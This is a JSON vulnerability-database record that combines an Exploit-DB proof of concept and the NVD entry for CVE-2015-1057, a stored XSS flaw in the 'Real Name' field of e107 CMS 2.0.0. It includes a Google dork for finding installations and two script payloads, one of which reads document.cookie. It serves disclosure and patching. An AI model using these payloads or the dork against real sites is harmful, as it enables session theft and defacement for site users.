{"id": "EDB-ID:35679", "type": "exploitdb", "bulletinFamily": "exploit", "title": "e107 2 Bootstrap CMS - XSS Vulnerability", "description": "e107 2 Bootstrap CMS - XSS Vulnerability. CVE-2015-1057. Webapps exploit for php platform", "published": "2015-01-03T00:00:00", "modified": "2015-01-03T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/35679/", "reporter": "Ahmet Agar / 0x97", "references": [], "cvelist": ["CVE-2015-1057"], "lastseen": "2016-02-04T01:48:00", "viewCount": 64, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2016-02-04T01:48:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1057"]}], "modified": "2016-02-04T01:48:00", "rev": 2}, "vulnersScore": 5.7}, "sourceHref": "https://www.exploit-db.com/download/35679/", "sourceData": " _____ _____ ______\r\n| _ | | _ ||___ /\r\n| |/' |_ __| |_| | / / \r\n| /| \\ \\/ /\\____ | / / \r\n\\ |_/ /> < .___/ /./ / \r\n \\___//_/\\_\\\\____/ \\_/ \r\n by bl4ck s3c\r\n\r\n\r\n# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability\r\n# Date: 03-01-2014\r\n# Google Dork : Proudly powered by e107 \r\n# Exploit Author: Ahmet Agar / 0x97\r\n# Version: 2.0.0\r\n# Vendor Homepage: http://e107.org/\r\n# Tested on: OWASP Mantra & Iceweasel\r\n \r\n# Vulnerability Description:\r\n\r\nCMS user details section is vulnerable to XSS. You can run XSS payloads.\r\n\r\nXSS Vulnerability #1:\r\n\r\nGo Update user settings page\r\n\r\n\"http://{target-url}/usersettings.php\"\r\n\r\nSet Real Name value;\r\n\r\n\"><script>alert(String.fromCharCode(88, 83, 83))</script>\r\n\r\nor\r\n\r\n\"><script>alert(document.cookie)</script>\r\n\r\n\r\n========\r\nCredits:\r\n========\r\n \r\nVulnerability found and advisory written by Ahmet Agar.\r\n \r\n===========\r\nReferences:\r\n===========\r\n \r\nhttp://www.0x97.info\r\nhtts://twitter.com/_HacKingZ_\r\n\r\n", "osvdbidlist": ["116692"]}

{"cve": [{"lastseen": "2020-10-03T12:49:47", "description": "Cross-site scripting (XSS) vulnerability in usersettings.php in e107 2.0.0 allows remote attackers to inject arbitrary web script or HTML via the \"Real Name\" value.", "edition": 3, "cvss3": {}, "published": "2015-01-16T15:59:00", "title": "CVE-2015-1057", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1057"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:e107:e107:2.0.0"], "id": "CVE-2015-1057", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1057", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:e107:e107:2.0.0:*:*:*:*:*:*:*"]}]}